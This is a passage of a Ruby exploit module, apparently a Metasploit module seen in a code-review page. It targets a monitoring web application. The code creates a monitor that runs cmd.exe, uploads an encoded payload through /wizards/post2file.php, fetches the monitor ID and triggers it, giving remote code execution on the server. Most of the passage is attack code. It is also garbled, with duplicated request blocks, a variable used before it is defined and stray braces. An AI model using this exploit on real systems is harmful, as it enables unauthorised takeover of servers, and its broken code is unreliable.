'initialERDCId' => '20',
|
||||
'target' => '1',
|
||||
'targetType' => 'systemList',
|
||||
'systemList' => '1',
|
||||
'serviceGroupList' => '-10',
|
||||
'initialMode' => 'standard',
|
||||
'erdcName' => 'Exploit',
|
||||
'erdcInitialName' => '',
|
||||
'erdcDescription' => 'Exploit',
|
||||
'hostButton' => 'system',
|
||||
'erdc_id' => '20',
|
||||
'forceReload' => '0',
|
||||
'operation' => 'standard',
|
||||
'erdc_instance_id' => '',
|
||||
'label_[184]' => 'Script Name',
|
||||
'value_[184]' => 'c:\windows\system32\cmd.exe',
|
||||
'id_[184]' => 'process',
|
||||
'name_[process]' => '184',
|
||||
'units_[184]' => '',
|
||||
'guiBasic_[184]' => '1',
|
||||
'inputType_[184]' => 'GUIString',
|
||||
'screenOrder_[184]' => '1',
|
||||
'parmType_[184]' => '1',
|
||||
'label_[185]' => 'Arguments',
|
||||
'value_[185]' => "/K \"\"#{phppath}\"" + ' ' + "\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ",
|
||||
'id_[185]' => 'args',
|
||||
'name_[args]' => '185',
|
||||
'units_[185]' => '',
|
||||
'guiBasic_[185]' => '1',
|
||||
'inputType_[185]' => 'GUIString',
|
||||
'screenOrder_[185]' => '2',
|
||||
'parmType_[185]' => '1',
|
||||
'label_[187]' => 'Output',
|
||||
'can_retain_[187]' => 'false',
|
||||
'comparisonWarn_[187]' => '-1',
|
||||
'comparison_[187]' => '-1',
|
||||
'id_[187]' => 'value_critical_output',
|
||||
'name_[output]' => '187',
|
||||
'units_[187]' => '',
|
||||
'guiBasic_[187]' => '1',
|
||||
'inputType_[187]' => 'GUIString',
|
||||
'screenOrder_[187]' => '4',
|
||||
'parmType_[187]' => '2',
|
||||
'label_[189]' => 'Response time',
|
||||
'can_retain_[189]' => 'false',
|
||||
'comparisonWarn_[189]' => '-1',
|
||||
'comparison_[189]' => '-1',
|
||||
'id_[189]' => 'value_critical_timer',
|
||||
'name_[timer]' => '189',
|
||||
'units_[189]' => 'ms',
|
||||
'guiBasic_[189]' => '0',
|
||||
'inputType_[189]' => 'GUIInteger',
|
||||
'screenOrder_[189]' => '6',
|
||||
'parmType_[189]' => '2',
|
||||
'timing_[erdc_instance_monitored]' => '1',
|
||||
'timing_[timeout]' => '60',
|
||||
'timing_[check_interval]' => '10',
|
||||
'timing_[recheck_interval]' => '1',
|
||||
'timing_[max_rechecks]' => '3',
|
||||
'alerting_[notification]' => '1',
|
||||
'alerting_[alert_interval]' => '120',
|
||||
'alerting_[alert_on_critical]' => '1',
|
||||
'alerting_[alert_on_warning]' => '1',
|
||||
'alerting_[alert_on_recovery]' => '1',
|
||||
'alerting_[alert_on_unknown]' => '1',
|
||||
'time_period_id' => '1',
|
||||
'pageFinish' => 'Finish',
|
||||
'pageContinue' => 'Continue...',
|
||||
'isWizard' => '1',
|
||||
'wizardPage' => '2',
|
||||
'wizardNumPages' => '2',
|
||||
'wizardTask' => 'pageFinish',
|
||||
'visitedPage[1]' => '1',
|
||||
'visitedPage[2]' => '1'
|
||||
})
|
||||
end
|
||||
|
||||
# #######Upload file###############################################
|
||||
print_status('Uploading file...')
|
||||
res_upload = send_request_cgi('method' => 'POST',
|
||||
'uri' => '/wizards/post2file.php',
|
||||
'vars_post' => {
|
||||
'file_name' => phpfile_name + '.txt',
|
||||
'script' => payload.encoded
|
||||
})
|
||||
|
||||
} )
|
||||
print_status('Cheking Uploaded file...')
|
||||
res_up_check = send_request_cgi('method' => 'GET',
|
||||
'uri' => '/wizards' + '/' + phpfile_name + '.txt',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
})
|
||||
|
||||
matchdata=res_mon_id.body.match(/id=?[^>]*>/)
|
||||
if res_up_check.code == 200
|
||||
print_good("File found: #{phpfile_name}")
|
||||
else
|
||||
print_error('File not found')
|
||||
end
|
||||
|
||||
mon_get_id= matchdata[0].gsub(/[^\d]/, '')
|
||||
print_good("Monitor id aquired:#{mon_get_id}")
|
||||
####Executing monitor####################################################################
|
||||
res_exec_mon = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'headers' => {
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
},
|
||||
'vars_post' => {
|
||||
'section' => 'RunERDCInstance',
|
||||
'subsection' => 'view',
|
||||
'id' => mon_get_id,
|
||||
'name' => 'Exploit'
|
||||
# ####Get Monitor ID##################################################################
|
||||
|
||||
}
|
||||
} )
|
||||
######################################################################################
|
||||
print_status('Fetching Monitor ID...')
|
||||
res_mon_id = send_request_cgi('method' => 'GET',
|
||||
'uri' => '/ajax/jsonQuery.php',
|
||||
'vars_get' => {
|
||||
'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
|
||||
'iDisplayStart' => '0',
|
||||
'iDisplayLength' => '10',
|
||||
'sSearch' => 'Exploit'
|
||||
},
|
||||
'headers' => {
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
})
|
||||
|
||||
matchdata = res_mon_id.body.match(/id=?[^>]*>/)
|
||||
|
||||
mon_get_id = matchdata[0].gsub(/[^\d]/, '')
|
||||
print_good("Monitor id aquired:#{mon_get_id}")
|
||||
# ###Executing monitor####################################################################
|
||||
res_exec_mon = send_request_cgi('method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
},
|
||||
'vars_post' => {
|
||||
'section' => 'RunERDCInstance',
|
||||
'subsection' => 'view',
|
||||
'id' => mon_get_id,
|
||||
'name' => 'Exploit'
|
||||
|
||||
})
|
||||
######################################################################################
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Cookie not found")
|
||||
return nil
|
||||
print_error("#{rhost}:#{rport} - Cookie not found")
|
||||
return nil
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue